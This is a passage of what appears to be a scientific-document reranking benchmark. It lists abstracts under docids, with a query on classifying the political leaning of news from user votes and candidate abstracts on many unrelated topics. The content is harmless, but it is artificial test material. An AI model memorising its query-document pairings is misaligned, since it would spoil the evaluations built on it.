] | [
{
"docid": "390f82c33b6b0966513a2b6480712dd3",
"text": "Social media systems promise powerful opportunities for people to connect to timely, relevant information at the hyper local level. Yet, finding the meaningful signal in noisy social media streams can be quite daunting to users. In this paper, we present and evaluate Whoo.ly, a web service that provides neighborhood-specific information based on Twitter posts that were automatically inferred to be hyperlocal. Whoo.ly automatically extracts and summarizes hyperlocal information about events, topics, people, and places from these Twitter posts. We provide an overview of our design goals with Whoo.ly and describe the system including the user interface and our unique event detection and summarization algorithms. We tested the usefulness of the system as a tool for finding neighborhood information through a comprehensive user study. The outcome demonstrated that most participants found Whoo.ly easier to use than Twitter and they would prefer it as a tool for exploring their neighborhoods.",
"title": ""
},
{
"docid": "b9b53f3e3196e31a24e32dd1902eea63",
"text": "Currency, defined here as banknotes and coins, plays an important role in the economy as a medium of exchange and a store of value. For Australia’s currency to function efficiently, it is important that the public has confidence in it and is therefore willing to accept banknotes and coins in transactions. Counterfeiting currency is a crime under the Crimes (Currency) Act 1981, and carries penalties of up to 14 years’ jail. People who fall victim to this crime have essentially been robbed. They cannot be reimbursed for their loss as, among other things, doing so would serve as an incentive to counterfeiters to continue their illegal activities. As a result, a high prevalence of counterfeiting can threaten public confidence in currency given that someone who accepts a counterfeit in place of a genuine banknote is left out of pocket and may be reluctant to accept banknotes in the future. Under the Reserve Bank Act 1959, the Reserve Bank issues Australia’s banknotes and has a mandate to contribute to the stability of the Australian currency. To ensure the security of these banknotes, the Reserve Bank works actively to monitor and manage the threat of banknote counterfeiting in Australia. The Reserve Bank works in partnership with key stakeholders to ensure that cash-handling professionals have information on how to detect counterfeits, that machines can authenticate banknotes, and that counterfeiters are apprehended and prosecuted (Evans, Gallagher and Martz 2015). The periodic issuance of new banknote series with upgraded security features, as is currently under way in Australia, is key to ensuring the security of, and thus confidence in, banknotes. Research into potential new security features is ongoing so that the Reserve Bank is well placed to develop and issue new banknote series as required and before counterfeiting levels become problematic. Monitoring of counterfeit activities informs the Bank’s decisions about the timing of such issuance. Recent Trends in Banknote Counterfeiting",
"title": ""
},
{
"docid": "885bf946dbbfc462cd066794fe486da3",
"text": "Efficient implementation of block cipher is important on the way to achieving high efficiency with good understand ability. Numerous number of block cipher including Advance Encryption Standard have been implemented using different platform. However the understanding of the AES algorithm step by step is very complicated. This paper presents the implementation of AES algorithm and explains Avalanche effect with the help of Avalanche test result. For this purpose we use Xilinx ISE 9.1i platform in Algorithm development and ModelSim SE 6.3f platform for results confirmation and computation.",
"title": ""
},
{
"docid": "83393c9a0392249409a057914c71b1a0",
"text": "Recent achievement of the learning-based classification leads to the noticeable performance improvement in automatic polyp detection. Here, building large good datasets is very crucial for learning a reliable detector. However, it is practically challenging due to the diversity of polyp types, expensive inspection, and labor-intensive labeling tasks. For this reason, the polyp datasets usually tend to be imbalanced, i.e., the number of non-polyp samples is much larger than that of polyp samples, and learning with those imbalanced datasets results in a detector biased toward a non-polyp class. In this paper, we propose a data sampling-based boosting framework to learn an unbiased polyp detector from the imbalanced datasets. In our learning scheme, we learn multiple weak classifiers with the datasets rebalanced by up/down sampling, and generate a polyp detector by combining them. In addition, for enhancing discriminability between polyps and non-polyps that have similar appearances, we propose an effective feature learning method using partial least square analysis, and use it for learning compact and discriminative features. Experimental results using challenging datasets show obvious performance improvement over other detectors. We further prove effectiveness and usefulness of the proposed methods with extensive evaluation.",
"title": ""
},
{
"docid": "8b3042021e48c86873e00d646f65b052",
"text": "We derive a numerical method for Darcy flow, hence also for Poisson’s equation in first order form, based on discrete exterior calculus (DEC). Exterior calculus is a generalization of vector calculus to smooth manifolds and DEC is its discretization on simplicial complexes such as triangle and tetrahedral meshes. We start by rewriting the governing equations of Darcy flow using the language of exterior calculus. This yields a formulation in terms of flux differential form and pressure. The numerical method is then derived by using the framework provided by DEC for discretizing differential forms and operators that act on forms. We also develop a discretization for spatially dependent Hodge star that varies with the permeability of the medium. This also allows us to address discontinuous permeability. The matrix representation for our discrete non-homogeneous Hodge star is diagonal, with positive diagonal entries. The resulting linear system of equations for flux and pressure are saddle type, with a diagonal matrix as the top left block. Our method requires the use of meshes in which each simplex contains its circumcenter. The performance of the proposed numerical method is illustrated on many standard test problems. These include patch tests in two and three dimensions, comparison with analytically known solution in two dimensions, layered medium with alternating permeability values, and a test with a change in permeability along the flow direction. A short introduction to the relevant parts of smooth and discrete exterior calculus is included in this paper. We also include a discussion of the boundary condition in terms of exterior calculus.",
"title": ""
},
{
"docid": "09eb96a9be1c8ee56503881e0fd936d5",
"text": "Essential oils are volatile, natural, complex mixtures of compounds characterized by a strong odour and formed by aromatic plants as secondary metabolites. The chemical composition of the essential oil obtained by hydrodistillation from the whole plant of Pulicaria inuloides grown in Yemen and collected at full flowering stage were analyzed by Gas chromatography-Mass spectrometry (GC-MS). Several oil components were identified based upon comparison of their mass spectral data with those of reference compounds. The main components identified in the oil were 47.34% of 2-Cyclohexen-1-one, 2-methyl-5-(1-methyl with Hexadecanoic acid (CAS) (12.82%) and Ethane, 1,2-diethoxy(9.613%). In this study, mineral contents of whole plant of P. inuloides were determined by atomic absorption spectroscopy. Highest level of K, Mg, Na, Fe and Ca of 159.5, 29.5, 14.2, 13.875 and 5.225 mg/100 g were found in P. inuloides.",
"title": ""
},
{
"docid": "999c7d8d16817d4b991e5b794be3b074",
"text": "Smile detection from facial images is a specialized task in facial expression analysis with many potential applications such as smiling payment, patient monitoring and photo selection. The current methods on this study are to represent face with low-level features, followed by a strong classifier. However, these manual features cannot well discover information implied in facial images for smile detection. In this paper, we propose to extract high-level features by a well-designed deep convolutional networks (CNN). A key contribution of this work is that we use both recognition and verification signals as supervision to learn expression features, which is helpful to reduce same-expression variations and enlarge different-expression differences. Our method is end-to-end, without complex pre-processing often used in traditional methods. High-level features are taken from the last hidden layer neuron activations of deep CNN, and fed into a soft-max classifier to estimate. Experimental results show that our proposed method is very effective, which outperforms the state-of-the-art methods. On the GENKI smile detection dataset, our method reduces the error rate by 21% compared with the previous best method.",
"title": ""
},
{
"docid": "2281d739c6858d35eb5f3650d2d03474",
"text": "We discuss an implementation of the RRT* optimal motion planning algorithm for the half-car dynamical model to enable autonomous high-speed driving. To develop fast solutions of the associated local steering problem, we observe that the motion of a special point (namely, the front center of oscillation) can be modeled as a double integrator augmented with fictitious inputs. We first map the constraints on tire friction forces to constraints on these augmented inputs, which provides instantaneous, state-dependent bounds on the curvature of geometric paths feasibly traversable by the front center of oscillation. Next, we map the vehicle's actual inputs to the augmented inputs. The local steering problem for the half-car dynamical model can then be transformed to a simpler steering problem for the front center of oscillation, which we solve efficiently by first constructing a curvature-bounded geometric path and then imposing a suitable speed profile on this geometric path. Finally, we demonstrate the efficacy of the proposed motion planner via numerical simulation results.",
"title": ""
},
{
"docid": "b6303ae2b77ac5c187694d5320ef65ff",
"text": "Mechanisms for continuously changing or shifting a system's attack surface are emerging as game-changers in cyber security. In this paper, we propose a novel defense mechanism for protecting the identity of nodes in Mobile Ad Hoc Networks and defeat the attacker's reconnaissance efforts. The proposed mechanism turns a classical attack mechanism - Sybil - into an effective defense mechanism, with legitimate nodes periodically changing their virtual identity in order to increase the uncertainty for the attacker. To preserve communication among legitimate nodes, we modify the network layer by introducing (i) a translation service for mapping virtual identities to real identities; (ii) a protocol for propagating updates of a node's virtual identity to all legitimate nodes; and (iii) a mechanism for legitimate nodes to securely join the network. We show that the proposed approach is robust to different types of attacks, and also show that the overhead introduced by the update protocol can be controlled by tuning the update frequency.",
"title": ""
},
{
"docid": "8c2c54207fa24358552bc30548bec5bc",
"text": "This paper proposes an edge bundling approach applied on parallel coordinates to improve the visualization of cluster information directly from the overview. Lines belonging to a cluster are bundled into a single curve between axes, where the horizontal and vertical positioning of the bundling intersection (known as bundling control points) to encode pertinent information about the cluster in a given dimension, such as variance, standard deviation, mean, median, and so on. The hypothesis is that adding this information to the overview improves the visualization overview at the same that it does not prejudice the understanding in other aspects. We have performed tests with participants to compare our approach with classic parallel coordinates and other consolidated bundling technique. The results showed most of the initially proposed hypotheses to be confirmed at the end of the study, as the tasks were performed successfully in the majority of tasks maintaining a low response time in average, as well as having more aesthetic pleasing according to participants' opinion.",
"title": ""
},
{
"docid": "676a91eee10de39ab11ea9c98b78ea0a",
"text": "Advances in synthetic biology have enabled the engineering of cells with genetic circuits in order to program cells with new biological behavior, dynamic gene expression, and logic control. This cellular engineering progression offers an array of living sensors that can discriminate between cell states, produce a regulated dose of therapeutic biomolecules, and function in various delivery platforms. In this review, we highlight and summarize the tools and applications in bacterial and mammalian synthetic biology. The examples detailed in this review provide insight to further understand genetic circuits, how they are used to program cells with novel functions, and current methods to reliably interface this technology in vivo; thus paving the way for the design of promising novel therapeutic applications.",
"title": ""
},
{
"docid": "91eac59a625914805a22643c6fe79ad1",
"text": "Channel state information at the transmitter (CSIT) is essential for frequency-division duplexing (FDD) massive MIMO systems, but conventional solutions involve overwhelming overhead both for downlink channel training and uplink channel feedback. In this letter, we propose a joint CSIT acquisition scheme to reduce the overhead. Particularly, unlike conventional schemes where each user individually estimates its own channel and then feed it back to the base station (BS), we propose that all scheduled users directly feed back the pilot observation to the BS, and then joint CSIT recovery can be realized at the BS. We further formulate the joint CSIT recovery problem as a low-rank matrix completion problem by utilizing the low-rank property of the massive MIMO channel matrix, which is caused by the correlation among users. Finally, we propose a hybrid low-rank matrix completion algorithm based on the singular value projection to solve this problem. Simulations demonstrate that the proposed scheme can provide accurate CSIT with lower overhead than conventional schemes.",
"title": ""
},
{
"docid": "abde419c67119fa9d16f365262d39b34",
"text": "Silicon nitride is the most commonly used passivation layer in biosensor applications where electronic components must be interfaced with ionic solutions. Unfortunately, the predominant method for functionalizing silicon nitride surfaces, silane chemistry, suffers from a lack of reproducibility. As an alternative, we have developed a silane-free pathway that allows for the direct functionalization of silicon nitride through the creation of primary amines formed by exposure to a radio frequency glow discharge plasma fed with humidified air. The aminated surfaces can then be further functionalized by a variety of methods; here we demonstrate using glutaraldehyde as a bifunctional linker to attach a robust NeutrAvidin (NA) protein layer. Optimal amine formation, based on plasma exposure time, was determined by labeling treated surfaces with an amine-specific fluorinated probe and characterizing the coverage using X-ray photoelectron spectroscopy (XPS). XPS and radiolabeling studies also reveal that plasma-modified surfaces, as compared with silane-modified surfaces, result in similar NA surface coverage, but notably better reproducibility.",
"title": ""
},
{
"docid": "7853936d58687b143bc135e6e60092ce",
"text": "Multilabel learning has become a relevant learning paradigm in the past years due to the increasing number of fields where it can be applied and also to the emerging number of techniques that are being developed. This article presents an up-to-date tutorial about multilabel learning that introduces the paradigm and describes the main contributions developed. Evaluation measures, fields of application, trending topics, and resources are also presented.",
"title": ""
},
{
"docid": "af48f00757d8e95d92facca57cd9d13c",
"text": "Remaining useful life (RUL) prediction allows for predictive maintenance of machinery, thus reducing costly unscheduled maintenance. Therefore, RUL prediction of machinery appears to be a hot issue attracting more and more attention as well as being of great challenge. This paper proposes a model-based method for predicting RUL of machinery. The method includes two modules, i.e., indicator construction and RUL prediction. In the first module, a new health indicator named weighted minimum quantization error is constructed, which fuses mutual information from multiple features and properly correlates to the degradation processes of machinery. In the second module, model parameters are initialized using the maximum-likelihood estimation algorithm and RUL is predicted using a particle filtering-based algorithm. The proposed method is demonstrated using vibration signals from accelerated degradation tests of rolling element bearings. The prediction result identifies the effectiveness of the proposed method in predicting RUL of machinery.",
"title": ""
},
{
"docid": "7f110e4769b996de13afe63962bcf2d2",
"text": "Versu is a text-based simulationist interactive drama. Because it uses autonomous agents, the drama is highly replayable: you can play the same story from multiple perspectives, or assign different characters to the various roles. The architecture relies on the notion of a social practice to achieve coordination between the independent autonomous agents. A social practice describes a recurring social situation, and is a successor to the Schankian script. Social practices are implemented as reactive joint plans, providing affordances to the agents who participate in them. The practices never control the agents directly; they merely provide suggestions. It is always the individual agent who decides what to do, using utility-based reactive action selection.",
"title": ""
},
{
"docid": "ce55e0912f78fbe781c26598d61b3664",
"text": "This paper presents a reversible or lossless watermarking algorithm for images without using a location map in most cases. This algorithm employs prediction errors to embed data into an image. A sorting technique is used to record the prediction errors based on magnitude of its local variance. Using sorted prediction errors and, if needed, though rarely, a reduced size location map allows us to embed more data into the image with less distortion. The performance of the proposed reversible watermarking scheme is evaluated using different images and compared with four methods: those of Kamstra and Heijmans, Thodi and Rodriguez, and Lee et al. The results clearly indicate that the proposed scheme can embed more data with less distortion.",
"title": ""
},
{
"docid": "827e9045f932b146a8af66224e114be6",
"text": "Using a common set of attributes to determine which methodology to use in a particular data warehousing project.",
"title": ""
},
{
"docid": "17806963c91f6d6981f1dcebf3880927",
"text": "The ability to assess the reputation of a member in a web community is a need addressed in many different ways according to the many different stages in which the nature of communities has evolved over time. In the case of reputation of goods/services suppliers, the solutions available to prevent the feedback abuse are generally reliable but centralized under the control of few big Internet companies. In this paper we show how a decentralized and distributed feedback management system can be built on top of the Bitcoin blockchain.",
"title": ""
},
{
"docid": "9b9a2a9695f90a6a9a0d800192dd76f6",
"text": "Due to high competition in today's business and the need for satisfactory communication with customers, companies understand the inevitable necessity to focus not only on preventing customer churn but also on predicting their needs and providing the best services for them. The purpose of this article is to predict future services needed by wireless users, with data mining techniques. For this purpose, the database of customers of an ISP in Shiraz, which logs the customer usage of wireless internet connections, is utilized. Since internet service has three main factors to define (Time, Speed, Traffics) we predict each separately. First, future service demand is predicted by implementing a simple Recency, Frequency, Monetary (RFM) as a basic model. Other factors such as duration from first use, slope of customer's usage curve, percentage of activation, Bytes In, Bytes Out and the number of retries to establish a connection and also customer lifetime value are considered and added to RFM model. Then each one of R, F, M criteria is alternately omitted and the result is evaluated. Assessment is done through analysis node which determines the accuracy of evaluated data among partitioned data. The result shows that CART and C5.0 are the best algorithms to predict future services in this case. As for the features, depending upon output of each features, duration and transfer Bytes are the most important after RFM. An ISP may use the model discussed in this article to meet customers' demands and ensure their loyalty and satisfaction.",
"title": ""
}
] | scidocsrr |
29eea63213e67fed705a51de82e5e04c | Classifying the Political Leaning of News Articles and Users from User Votes | [
{
"docid": "7f05bd51c98140417ff73ec2d4420d6a",
"text": "An overwhelming number of news articles are available every day via the internet. Unfortunately, it is impossible for us to peruse more than a handful; furthermore it is difficult to ascertain an article’s social context, i.e., is it popular, what sorts of people are reading it, etc. In this paper, we develop a system to address this problem in the restricted domain of political news by harnessing implicit and explicit contextual information from the blogosphere. Specifically, we track thousands of blogs and the news articles they cite, collapsing news articles that have highly overlapping content. We then tag each article with the number of blogs citing it, the political orientation of those blogs, and the level of emotional charge expressed in the blog posts that link to the news article. We summarize and present the results to the user via a novel visualization which displays this contextual information; the user can then find the most popular articles, the articles most cited by liberals, the articles most emotionally discussed in the political blogosphere, etc.",
"title": ""
},
{
"docid": "f66854fd8e3f29ae8de75fc83d6e41f5",
"text": "This paper presents a general statistical methodology for the analysis of multivariate categorical data arising from observer reliability studies. The procedure essentially involves the construction of functions of the observed proportions which are directed at the extent to which the observers agree among themselves and the construction of test statistics for hypotheses involving these functions. Tests for interobserver bias are presented in terms of first-order marginal homogeneity and measures of interobserver agreement are developed as generalized kappa-type statistics. These procedures are illustrated with a clinical diagnosis example from the epidemiological literature.",
"title": ""
}
] | [
{
"docid": "a15275cc08ad7140e6dd0039e301dfce",
"text": "Cardiovascular disease is more prevalent in type 1 and type 2 diabetes, and continues to be the leading cause of death among adults with diabetes. Although atherosclerotic vascular disease has a multi-factorial etiology, disorders of lipid metabolism play a central role. The coexistence of diabetes with other risk factors, in particular with dyslipidemia, further increases cardiovascular disease risk. A characteristic pattern, termed diabetic dyslipidemia, consists of increased levels of triglycerides, low levels of high density lipoprotein cholesterol, and postprandial lipemia, and is mostly seen in patients with type 2 diabetes or metabolic syndrome. This review summarizes the trends in the prevalence of lipid disorders in diabetes, advances in the mechanisms contributing to diabetic dyslipidemia, and current evidence regarding appropriate therapeutic recommendations.",
"title": ""
},
{
"docid": "89318aa5769daa08a67ae7327c458e8e",
"text": "The present thesis is concerned with the development and evaluation (in terms of accuracy and utility) of systems using hand postures and hand gestures for enhanced Human-Computer Interaction (HCI). In our case, these systems are based on vision techniques, thus only requiring cameras, and no other specific sensors or devices. When dealing with hand movements, it is necessary to distinguish two aspects of these hand movements : the static aspect and the dynamic aspect. The static aspect is characterized by a pose or configuration of the hand in an image and is related to the Hand Posture Recognition (HPR) problem. The dynamic aspect is defined either by the trajectory of the hand, or by a series of hand postures in a sequence of images. This second aspect is related to the Hand Gesture Recognition (HGR) task. Given the recognized lack of common evaluation databases in the HGR field, a first contribution of this thesis was the collection and public distribution of two databases, containing both oneand two-handed gestures, which part of the results reported here will be based upon. On these databases, we compare two state-of-the-art models for the task of HGR. As a second contribution, we propose a HPR technique based on a new feature extraction. This method has the advantage of being faster than conventional methods while yielding good performances. In addition, we provide comparison results of this method with other state-of-the-art technique. Finally, the most important contribution of this thesis lies in the thorough study of the state-of-the-art not only in HGR and HPR but also more generally in the field of HCI. The first chapter of the thesis provides an extended study of the state-of-the-art. The second chapter of this thesis contributes to HPR. We propose to apply for HPR a technique employed with success for face detection. This method is based on the Modified Census Transform (MCT) to extract relevant features in images. We evaluate this technique on an existing benchmark database and provide comparison results with other state-of-the-art approaches. The third chapter is related to HGR. In this chapter we describe the first recorded database, containing both oneand two-handed gestures in the 3D space. We propose to compare two models used with success in HGR, namely Hidden Markov Models (HMM) and Input-Output Hidden Markov Model (IOHMM). The fourth chapter is also focused on HGR but more precisely on two-handed gesture recognition. For that purpose, a second database has been recorded using two cameras. The goal of these gestures is to manipulate virtual objects on a screen. We propose to investigate on this second database the state-of-the-art sequence processing techniques we used in the previous chapter. We then discuss the results obtained using different features, and using images of one or two cameras. In conclusion, we propose a method for HPR based on new feature extraction. For HGR, we provide two databases and comparison results of two major sequence processing techniques. Finally, we present a complete survey on recent state-of-the-art techniques for both HPR and HGR. We also present some possible applications of these techniques, applied to two-handed gesture interaction. We hope this research will open new directions in the field of hand posture and gesture recognition.",
"title": ""
},
{
"docid": "8954672b2e2b6351abfde0747fd5d61c",
"text": "Sentiment Analysis (SA), an application of Natural Language processing (NLP), has been witnessed a blooming interest over the past decade. It is also known as opinion mining, mood extraction and emotion analysis. The basic in opinion mining is classifying the polarity of text in terms of positive (good), negative (bad) or neutral (surprise). Mood Extraction automates the decision making performed by human. It is the important aspect for capturing public opinion about product preferences, marketing campaigns, political movements, social events and company strategies. In addition to sentiment analysis for English and other European languages, this task is applied on various Indian languages like Bengali, Hindi, Telugu and Malayalam. This paper describes the survey on main approaches for performing sentiment extraction.",
"title": ""
},
{
"docid": "9a68a804863b5cfd2a271518c3d360ef",
"text": "Clinicians whose practice includes elderly patients need a short, reliable instrument to detect the presence of intellectual impairment and to determine the degree. A 10-item Short Portable Mental Status Questionnaire (SPMSQ), easily administered by any clinician in the office or in a hospital, has been designed, tested, standardized and validated. The standardization and validation procedure included administering the test to 997 elderly persons residing in the community, to 141 elderly persons referred for psychiatric and other health and social problems to a multipurpose clinic, and to 102 elderly persons living in institutions such as nursing homes, homes for the aged, or state mental hospitals. It was found that educational level and race had to be taken into account in scoring individual performance. On the basis of the large community population, standards of performance were established for: 1) intact mental functioning, 2) borderline or mild organic impairment, 3) definite but moderate organic impairment, and 4) severe organic impairment. In the 141 clinic patients, the SPMSQ scores were correlated with the clinical diagnoses. There was a high level of agreement between the clinical diagnosis of organic brain syndrome and the SPMSQ scores that indicated moderate or severe organic impairment.",
"title": ""
},
{
"docid": "2bf0219394d87654d2824c805844fcaa",
"text": "Wei-yu Kevin Chiang • Dilip Chhajed • James D. Hess Department of Information Systems, University of Maryland at Baltimore County, Baltimore, Maryland 21250 Department of Business Administration, University of Illinois at Urbana–Champaign, Champaign, Illinois 61820 Department of Business Administration, University of Illinois at Urbana–Champaign, Champaign, Illinois 61820 kevin@wchiang.net • chhajed@uiuc.edu • jhess@uiuc.edu",
"title": ""
},
{
"docid": "e49369808eecc67d10f4084245e25163",
"text": "In recent years, the recognition of activity is a daring task which helps elderly people, disabled patients and so on. The aim of this paper is to design a system for recognizing the human activity in egocentric video. In this research work, the various textural features like gray level co-occurrence matrix and local binary pattern and point feature speeded up robust features are retrieved from activity videos which is a proposed work and classifiers like probabilistic neural network, support vector machine (SVM), k nearest neighbor (kNN) and proposed SVM+kNN classifiers are used to classify the activity. Here, multimodal egocentric activity dataset is chosen as input. The performance results showed that the SVM+kNN classifier outperformed other classifiers.",
"title": ""
},
{
"docid": "6a851f4fdd456dbaef547a63d53c7a5a",
"text": "In the 20th century, the introduction of multiple vaccines significantly reduced childhood morbidity, mortality, and disease outbreaks. Despite, and perhaps because of, their public health impact, an increasing number of parents and patients are choosing to delay or refuse vaccines. These individuals are described as \"vaccine hesitant.\" This phenomenon has developed due to the confluence of multiple social, cultural, political, and personal factors. As immunization programs continue to expand, understanding and addressing vaccine hesitancy will be crucial to their successful implementation. This review explores the history of vaccine hesitancy, its causes, and suggested approaches for reducing hesitancy and strengthening vaccine acceptance.",
"title": ""
},
{
"docid": "62d1574e23fcf07befc54838ae2887c1",
"text": "Digital images are widely used and numerous application in different scientific fields use digital image processing algorithms where image segmentation is a common task. Thresholding represents one technique for solving that task and Kapur's and Otsu's methods are well known criteria often used for selecting thresholds. Finding optimal threshold values represents a hard optimization problem and swarm intelligence algorithms have been successfully used for solving such problems. In this paper we adjusted recent elephant herding optimization algorithm for multilevel thresholding by Kapur's and Otsu's method. Performance was tested on standard benchmark images and compared with four other swarm intelligence algorithms. Elephant herding optimization algorithm outperformed other approaches from literature and it was more robust.",
"title": ""
},
{
"docid": "76092028b6d109c5e73521d796643eb0",
"text": "Volume raycasting techniques are important for both visual arts and visualization. They allow efficient generation of visual effects and visualization of scientific data obtained by tomography or numerical simulation. Volume-rendering techniques are also effective for direct rendering of implicit surfaces used for soft-body animation and constructive solid geometry. The focus of this course is on volumetric illumination techniques that approximate physically based light transport in participating media. Such techniques include interactive implementation of soft and hard shadows, ambient occlusion, and simple Monte Carlo-based approaches to global illumination, including translucency and scattering.",
"title": ""
},
{
"docid": "3744970293b3ed4c4543e6f2313fe2e4",
"text": "With the proliferation of GPS-enabled smart devices and increased availability of wireless network, spatial crowdsourcing (SC) has been recently proposed as a framework to automatically request workers (i.e., smart device carriers) to perform location-sensitive tasks (e.g., taking scenic photos, reporting events). In this paper we study a destination-aware task assignment problem that concerns the optimal strategy of assigning each task to proper worker such that the total number of completed tasks can be maximized whilst all workers can reach their destinations before deadlines after performing assigned tasks. Finding the global optimal assignment turns out to be an intractable problem since it does not imply optimal assignment for individual worker. Observing that the task assignment dependency only exists amongst subsets of workers, we utilize tree-decomposition technique to separate workers into independent clusters and develop an efficient depth-first search algorithm with progressive bounds to prune non-promising assignments. Our empirical studies demonstrate that our proposed technique is quite effective and settle the problem nicely.",
"title": ""
},
{
"docid": "849ae444bca6edc7b5d81c0b5c8e2f90",
"text": "This paper develops an electric vehicle switched-reluctance motor (SRM) drive powered by a battery/supercapacitor having grid-to-vehicle (G2V) and vehicle-to-home (V2H)/vehicle-to-grid (V2G) functions. The power circuit of the motor drive is formed by a bidirectional two-quadrant front-end dc/dc converter and an SRM asymmetric bridge converter. Through proper control and setting of key parameters, good acceleration/deceleration, reversible driving, and braking characteristics are obtained. In idle condition, the proposed motor drive schematic can be rearranged to construct the integrated power converter to perform the following functions: 1) G2V charging mode: a single-phase two-stage switch-mode rectifier based charger is formed with power factor correction capability; 2) autonomous V2H discharging mode: the 60-Hz 220-V/110-V ac sources are generated by the developed single-phase three-wire inverter to power home appliances. Through the developed differential mode and common mode control schemes, well-regulated output voltages are achieved; 3) grid-connected V2G discharging mode: the programmed real power can be sent back to the utility grid.",
"title": ""
},
{
"docid": "2c37ee67205320d54149a71be104c0e1",
"text": "This talk will review the mission, activities, and recommendations of the Blue Ribbon Panel on Cyberinfrastructure recently appointed by the leadership on the U.S. National Science Foundation (NSF). The NSF invests in people, ideas, and tools and in particular is a major investor in basic research to produce communication and information technology (ICT) as well as its use in supporting basic research and education in most all areas of science and engineering. The NSF through its Directorate for Computer and Information Science and Engineering (CISE) has provided substantial funding for high-end computing resources, initially by awards to five supercomputer centers and later through $70 M per year investments in two partnership alliances for advanced computation infrastructures centered at the University of Illinois and the University of California, San Diego. It has also invested in an array of complementary R&D initiatives in networking, middleware, digital libraries, collaboratories, computational and visualization science, and distributed terascale grid environments.",
"title": ""
},
{
"docid": "437ad5ac30619459627b8f76034da29d",
"text": "In 1986, this author presented a paper at a conference, giving a sampling of computer and network security issues, and the tools of the day to address them. The purpose of this current paper is to revisit the topic of computer and network security, and see what changes, especially in types of attacks, have been brought about in 30 years. This paper starts by presenting a review of the state of computer and network security in 1986, along with how certain facets of it have changed. Next, it talks about today's security environment, and finally discusses some of today's many computer and network attack methods that are new or greatly updated since 1986. Many references for further study are provided. The classes of attacks that are known today are the same as the ones known in 1986, but many new methods of implementing the attacks have been enabled by new technologies and the increased pervasiveness of computers and networks in today's society. The threats and specific types of attacks faced by the computer community 30 years ago have not gone away. New threat methods and attack vectors have opened due to advancing technology, supplementing and enhancing, rather than replacing the long-standing threat methods.",
"title": ""
},
{
"docid": "0a6a3e82b701bfbdbb73a9e8573fc94a",
"text": "Providing effective feedback on resource consumption in the home is a key challenge of environmental conservation efforts. One promising approach for providing feedback about residential energy consumption is the use of ambient and artistic visualizations. Pervasive computing technologies enable the integration of such feedback into the home in the form of distributed point-of-consumption feedback devices to support decision-making in everyday activities. However, introducing these devices into the home requires sensitivity to the domestic context. In this paper we describe three abstract visualizations and suggest four design requirements that this type of device must meet to be effective: pragmatic, aesthetic, ambient, and ecological. We report on the findings from a mixed methods user study that explores the viability of using ambient and artistic feedback in the home based on these requirements. Our findings suggest that this approach is a viable way to provide resource use feedback and that both the aesthetics of the representation and the context of use are important elements that must be considered in this design space.",
"title": ""
},
{
"docid": "5285b2b579c8a0f0915e76e41d66330c",
"text": "Not all bugs lead to program crashes, and not always is there a formal specification to check the correctness of a software test's outcome. A common scenario in software testing is therefore that test data are generated, and a tester manually adds test oracles. As this is a difficult task, it is important to produce small yet representative test sets, and this representativeness is typically measured using code coverage. There is, however, a fundamental problem with the common approach of targeting one coverage goal at a time: Coverage goals are not independent, not equally difficult, and sometimes infeasible-the result of test generation is therefore dependent on the order of coverage goals and how many of them are feasible. To overcome this problem, we propose a novel paradigm in which whole test suites are evolved with the aim of covering all coverage goals at the same time while keeping the total size as small as possible. This approach has several advantages, as for example, its effectiveness is not affected by the number of infeasible targets in the code. We have implemented this novel approach in the EvoSuite tool, and compared it to the common approach of addressing one goal at a time. Evaluated on open source libraries and an industrial case study for a total of 1,741 classes, we show that EvoSuite achieved up to 188 times the branch coverage of a traditional approach targeting single branches, with up to 62 percent smaller test suites.",
"title": ""
},
{
"docid": "2ffafb9e8c49d30b295a7047fe33268f",
"text": "The time-based resource-sharing model of working memory assumes that memory traces suffer from a time-related decay when attention is occupied by concurrent activities. Using complex continuous span tasks in which temporal parameters are carefully controlled, P. Barrouillet, S. Bernardin, S. Portrat, E. Vergauwe, & V. Camos (2007) recently provided evidence that any increase in time of the processing component of these tasks results in lower recall performance. However, K. Oberauer and R. Kliegl (2006) pointed out that, in this paradigm, increased processing times are accompanied by a corollary decrease of the remaining time during which attention is available to refresh memory traces. As a consequence, the main determinant of recall performance in complex span tasks would not be the duration of attentional capture inducing time-related decay, as Barrouillet et al. (2007) claimed, but the time available to repair memory traces, and thus would be compatible with an interference account of forgetting. The authors demonstrate here that even when the time available to refresh memory traces is kept constant, increasing the processing time still results in poorer recall, confirming that time-related decay is the source of forgetting within working memory.",
"title": ""
},
{
"docid": "8304686526c37e5d1e0e4e7708bf6c29",
"text": "JavaScript is becoming the de-facto programming language of the Web. Large-scale web applications (web apps) written in Javascript are commonplace nowadays, with big technology players (e.g., Google, Facebook) using it in their core flagship products. Today, it is common practice to reuse existing JavaScript code, usually in the form of third-party libraries and frameworks. If on one side this practice helps in speeding up development time, on the other side it comes with the risk of bringing dead code, i.e., JavaScript code which is never executed, but still downloaded from the network and parsed in the browser. This overhead can negatively impact the overall performance and energy consumption of the web app. In this paper we present Lacuna, an approach for JavaScript dead code elimination, where existing JavaScript analysis techniques are applied in combination. The proposed approach supports both static and dynamic analyses, it is extensible, and independent of the specificities of the used JavaScript analysis techniques. Lacuna can be applied to any JavaScript code base, without imposing any constraints to the developer, e.g., on her coding style or on the use of some specific JavaScript feature (e.g., modules). Lacuna has been evaluated on a suite of 29 publicly-available web apps, composed of 15,946 JavaScript functions, and built with different JavaScript frameworks (e.g., Angular, Vue.js, jQuery). Despite being a prototype, Lacuna obtained promising results in terms of analysis execution time and precision.",
"title": ""
},
{
"docid": "7f897e5994685f0b158da91cef99c855",
"text": "Cloud computing and its pay-as-you-go model continue to provide significant cost benefits and a seamless service delivery model for cloud consumers. The evolution of small-scale and large-scale geo-distributed datacenters operated and managed by individual cloud service providers raises new challenges in terms of effective global resource sharing and management of autonomously-controlled individual datacenter resources. Earlier solutions for geo-distributed clouds have focused primarily on achieving global efficiency in resource sharing that results in significant inefficiencies in local resource allocation for individual datacenters leading to unfairness in revenue and profit earned. In this paper, we propose a new contracts-based resource sharing model for federated geo-distributed clouds that allows cloud service providers to establish resource sharing contracts with individual datacenters apriori for defined time intervals during a 24 hour time period. Based on the established contracts, individual cloud service providers employ a cost-aware job scheduling and provisioning algorithm that enables tasks to complete and meet their response time requirements. The proposed techniques are evaluated through extensive experiments using realistic workloads and the results demonstrate the effectiveness, scalability and resource sharing efficiency of the proposed model.",
"title": ""
},
{
"docid": "e35194cb3fdd3edee6eac35c45b2da83",
